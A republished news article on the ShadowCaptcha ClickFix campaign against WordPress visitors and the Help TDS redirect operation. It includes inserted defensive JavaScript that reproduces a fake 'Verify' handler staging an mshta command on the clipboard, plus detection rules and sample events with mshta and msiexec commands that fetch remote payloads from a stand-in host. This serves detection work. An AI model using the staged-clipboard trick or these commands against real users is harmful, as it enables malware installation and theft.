ShadowCaptcha Targeting WordPress Sites to Distribute Ransomware, Data Theft Tools, and Crypto Miners


A wide-ranging campaign is using more than 100 compromised WordPress sites to lure visitors to fake CAPTCHA verification pages. The operation relies on the ClickFix social engineering technique to deliver information stealers, ransomware, and cryptocurrency mining software.

First identified in August 2025, the campaign has been named ShadowCaptcha by the Israel National Digital Agency.

“The campaign exhibits a seamless integration of social engineering, living-off-the-land binaries (LOLBins), and multi-stage payload delivery to secure and maintain access to targeted systems,” noted researchers Shimi Cohen, Adi Pick, Idan Beit Yosef, Hila David, and Yaniv Goldman in their findings.

ShadowCaptcha's goals are credential harvesting, exfiltration of browser data, covert cryptocurrency mining, and, in some cases, ransomware deployment.

The attack begins when a visitor lands on a compromised WordPress site that has been injected with malicious JavaScript. That code starts a redirection chain that ends on a counterfeit Cloudflare or Google CAPTCHA page.

From there the attack splits into two paths, depending on which ClickFix instructions the page shows: one has the victim paste a command into the Windows Run dialog, the other asks the victim to save the page as an HTML Application (HTA) file and open it, which runs it through mshta.exe.

The Run dialog path delivers the Lumma and Rhadamanthys stealers, either through MSI installers run with msiexec.exe or through remotely hosted HTA files launched with mshta.exe. Opening the saved HTA file, by contrast, leads to the Epsilon Red ransomware.


ClickFix lures that trick users into downloading malicious HTA files tied to Epsilon Red ransomware had previously been documented by CloudSEK.

“The compromised ClickFix page automatically executes obfuscated JavaScript that employs ‘navigator.clipboard.writeText’ to surreptitiously copy a malicious command to the user’s clipboard, relying on users to unwittingly paste and execute it,” the researchers elaborated.
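The clipboard trick the researchers describe, as an added example (not code from the ShadowCaptcha report or the researchers): a fake "Verify" click handler that stages a command with `navigator.clipboard.writeText`, next to a guard that classifies every clipboard write and blocks the ClickFix shape. The command strings, the hostname and the stand-in `navigator` object are constructed for the demonstration; the LOLBin names come from the campaign description above.

```javascript
// Added example, not code from the ShadowCaptcha report: how a ClickFix page stages a
// command through navigator.clipboard.writeText, and a guard that classifies each write
// before it reaches the clipboard. Command strings and the hostname are constructed.

// Indicators of a ClickFix-style payload: the Windows LOLBins the campaign is reported to
// use, common PowerShell download-and-run idioms, and a reference to a remote resource.
const LOLBIN_PATTERNS = [
  /\bmshta(\.exe)?\b/i,
  /\bmsiexec(\.exe)?\b/i,
  /\bpowershell(\.exe)?\b.*(-enc\b|-e\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|downloadstring)/i,
  /\bcmd(\.exe)?\b\s*\/c/i,
];
const REMOTE_PATTERN = /(https?:\/\/|\\\\[a-z0-9._-]+\\)/i; // URL or UNC path

// Classify text a page is about to place on the clipboard.
//   'benign'     no LOLBin reference
//   'suspicious' a LOLBin without a remote resource
//   'clickfix'   a LOLBin combined with a URL/UNC path, or several LOLBins chained together
function classifyClipboardWrite(text) {
  const hits = LOLBIN_PATTERNS.filter((re) => re.test(text)).length;
  if (hits === 0) return 'benign';
  return REMOTE_PATTERN.test(text) || hits > 1 ? 'clickfix' : 'suspicious';
}

// Wrap navigator.clipboard.writeText so every write is classified first. ClickFix pages
// call writeText from the click handler of the fake "Verify" button, so the wrapper runs
// inside that call. Returns the decision log so it can be inspected or sent to telemetry.
function installClipboardGuard(nav, { block = true } = {}) {
  const original = nav.clipboard.writeText.bind(nav.clipboard);
  const log = [];
  nav.clipboard.writeText = function guardedWriteText(text) {
    const payload = String(text);
    const verdict = classifyClipboardWrite(payload);
    log.push({ verdict, payload });
    if (block && verdict === 'clickfix') {
      // Thrown synchronously; a try/catch around the page's `await writeText(...)`
      // still catches it, so the page cannot tell whether the copy happened.
      throw new Error(`clipboard write blocked (${verdict}): ${payload}`);
    }
    return original(text);
  };
  return log;
}

// Minimal stand-in for the browser's navigator so the example runs under Node (constructed).
function makeFakeNavigator() {
  const store = { text: '' };
  return {
    clipboard: { writeText(t) { store.text = String(t); return Promise.resolve(); } },
    readBack: () => store.text,
  };
}

// What the fake CAPTCHA's "Verify" click handler does: copy the command silently, then
// show instructions to press Win+R, paste and hit Enter. Constructed hostname, not an IOC.
const STAGED_COMMAND = 'mshta http://captcha-verify.example/check.hta';

function fakeVerifyClick(nav) {
  try {
    nav.clipboard.writeText(STAGED_COMMAND);
    return 'copied';
  } catch (e) {
    return 'blocked';
  }
}

// Run the fake page against a guarded navigator, then make a benign write to show it passes.
function runDemo() {
  const nav = makeFakeNavigator();
  const log = installClipboardGuard(nav);
  const result = fakeVerifyClick(nav);
  nav.clipboard.writeText('Verification code: 7F3A-91QK');
  return { result, clipboard: nav.readBack(), log };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

In a browser the guard would be installed by a content script that runs before page scripts. Note that it only covers the asynchronous Clipboard API; a page can also copy through the older `document.execCommand('copy')` path, which needs a separate hook on `copy` events.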

The attacks also use anti-debugging tricks to hinder inspection of the pages with browser developer tools, and DLL side-loading so that malicious code runs under the name of a legitimate process.

Some ShadowCaptcha campaigns distribute an XMRig-based cryptocurrency miner. Certain variants fetch their mining configuration from a Pastebin URL, so the operators can change parameters without redeploying the miner.

Where a miner is deployed, attackers have also been seen dropping the vulnerable driver WinRing0x64.sys to gain kernel-level access and read and write CPU registers, which improves mining performance. A load of that driver on a host that runs no hardware-monitoring software is a useful hunting signal in its own right.
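Detection logic for the two execution paths described earlier (Run dialog versus saved HTA) and for the WinRing0x64.sys driver load, as an added example that is not part of the original report. It runs over constructed endpoint events shaped like Sysmon process-creation (Event ID 1) and driver-load (Event ID 6) records; the paths, hostname and record IDs are made up for the demonstration.

```javascript
// Added example, not code from the ShadowCaptcha report: flag the ClickFix execution
// paths (Run dialog -> mshta/msiexec with remote content; saved .hta run by mshta) and a
// WinRing0x64.sys driver load. Sample events below are constructed, not real telemetry.

const LOLBINS = new Set(['mshta.exe', 'msiexec.exe']);
const REMOTE_ARG = /(https?:\/\/|\\\\[a-z0-9._-]+\\)/i;   // URL or UNC path on the command line
const USER_WRITABLE = /\\(Users\\[^\\]+\\(Downloads|Desktop|AppData)|Temp|Windows\\Temp)\\/i;
const VULN_DRIVERS = new Set(['winring0x64.sys', 'winring0.sys']);

function basename(p) {
  return p.split(/[\\/]/).pop().toLowerCase();
}

// Return the findings for one event, or an empty list when it looks benign.
function analyzeEvent(ev) {
  const findings = [];
  if (ev.EventID === 1) {
    const image = basename(ev.Image);
    const parent = basename(ev.ParentImage);
    const cmd = ev.CommandLine || '';
    if (LOLBINS.has(image)) {
      // Path 1: Win+R. The Run dialog spawns the binary directly under explorer.exe, and
      // the campaign points it at remotely hosted MSI or HTA content.
      if (parent === 'explorer.exe' && REMOTE_ARG.test(cmd)) {
        findings.push(`run-dialog ${image} fetching remote content`);
      }
      // Path 2: the page was saved as .hta and opened; mshta runs it from a user-writable path.
      if (image === 'mshta.exe' && /\.hta\b/i.test(cmd) && USER_WRITABLE.test(cmd)) {
        findings.push('mshta executing .hta from user-writable path');
      }
    }
  } else if (ev.EventID === 6) {
    // Driver load: the miner's kernel-access helper, regardless of where it was dropped.
    const drv = basename(ev.ImageLoaded);
    if (VULN_DRIVERS.has(drv)) findings.push(`vulnerable driver loaded: ${drv}`);
  }
  return findings;
}

function scan(events) {
  return events.flatMap((ev) =>
    analyzeEvent(ev).map((finding) => ({ record: ev.RecordID, finding })));
}

// Constructed sample events (field names follow Sysmon; values are invented).
const SAMPLE_EVENTS = [
  { RecordID: 1, EventID: 1, Image: 'C:\\Windows\\System32\\mshta.exe', ParentImage: 'C:\\Windows\\explorer.exe',
    CommandLine: 'mshta http://captcha-verify.example/verify.hta' },
  { RecordID: 2, EventID: 1, Image: 'C:\\Windows\\System32\\msiexec.exe', ParentImage: 'C:\\Windows\\explorer.exe',
    CommandLine: 'msiexec /i http://captcha-verify.example/update.msi /qn' },
  { RecordID: 3, EventID: 1, Image: 'C:\\Windows\\System32\\mshta.exe', ParentImage: 'C:\\Windows\\explorer.exe',
    CommandLine: '"C:\\Windows\\System32\\mshta.exe" "C:\\Users\\alice\\Downloads\\verify.hta"' },
  { RecordID: 4, EventID: 1, Image: 'C:\\Windows\\System32\\msiexec.exe', ParentImage: 'C:\\Windows\\System32\\services.exe',
    CommandLine: 'C:\\Windows\\system32\\msiexec.exe /V' },   // normal Windows Installer service start
  { RecordID: 5, EventID: 6, ImageLoaded: 'C:\\Users\\alice\\AppData\\Local\\Temp\\WinRing0x64.sys' },
  { RecordID: 6, EventID: 1, Image: 'C:\\Windows\\explorer.exe', ParentImage: 'C:\\Windows\\System32\\userinit.exe',
    CommandLine: 'C:\\Windows\\Explorer.EXE' },
];

console.log(JSON.stringify(scan(SAMPLE_EVENTS), null, 2));
```

Records 1, 2, 3 and 5 are flagged; record 4 shows why the parent-process check matters, since msiexec.exe started by services.exe is the ordinary Windows Installer service and must not trip the rule.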

Most of the compromised WordPress sites are located in Australia, Brazil, Italy, Canada, Colombia, and Israel, and span sectors including technology, hospitality, legal and finance, healthcare, and real estate.


To defend against ShadowCaptcha, train users to recognize ClickFix lures (no legitimate CAPTCHA asks you to press Win+R and paste a command), segment networks to limit lateral movement, keep WordPress core, themes, and plugins up to date, and protect WordPress administrator accounts with multi-factor authentication (MFA).

“ShadowCaptcha illustrates the evolution of social engineering attacks into comprehensive cyber operations,” the researchers asserted. “By deceiving users into executing built-in Windows tools and layering obfuscated scripts with vulnerable drivers, operators achieve stealthy persistence and can pivot between data theft, crypto mining, or ransomware.”

The disclosure coincides with GoDaddy's report on the evolution of Help TDS, a traffic distribution system that has been active since 2017 and is linked to several malicious operations, including VexTrio Viper.

Help TDS supplies partners and affiliates with PHP code templates that are injected into WordPress sites and redirect visitors to malicious destinations that match the operators' targeting criteria.

“The operation is adept at tech support scams, relying on full-screen browser manipulation and exit prevention techniques to ensnare victims within fraudulent Microsoft Windows security alert pages, supplemented by fallback monetization via dating, cryptocurrency, and sweepstakes scams,” remarked security researcher Denis Sinegubko in his analysis.

Notable malware campaigns that have used Help TDS in recent years include DollyWay, Balada Injector, and DNS TXT redirects. The scam pages use JavaScript to force the browser into full-screen mode and display fake alerts, and present CAPTCHA challenges to keep automated security scanners from reaching the scam content.

Between late 2024 and August 2025, the Help TDS operators developed a malicious WordPress plugin named "woocommerce_inputs" that implements the redirect and has progressively gained credential harvesting, geographic filtering, and more sophisticated evasion. The plugin is estimated to be present on more than 10,000 sites worldwide.

Disguised as WooCommerce so that site owners do not notice it, the plugin is installed only by the attackers themselves, after they have compromised a WordPress site with stolen administrator credentials.

“This plugin serves a dual purpose as a traffic monetization tool and a mechanism for credential harvesting, epitomizing the ongoing evolution from basic redirection capabilities to a comprehensive malware-as-a-service model,” asserted GoDaddy.

“By offering pre-packaged solutions, including command-and-control infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins, Help TDS has significantly lowered the entry barrier for cybercriminals aiming to monetize compromised websites.”

Source link: Thehackernews.com.

Disclosure: This article is for general information only and is based on publicly available sources. We aim for accuracy but can't guarantee it. The views expressed are the author's and may not reflect those of the publication. Some content was created with help from AI and reviewed by a human for clarity and accuracy. We value transparency and encourage readers to verify important details. This article may include affiliate links. If you buy something through them, we may earn a small commission — at no extra cost to you. All information is carefully selected and reviewed to ensure it's helpful and trustworthy.

Reported By

RS Web Solutions
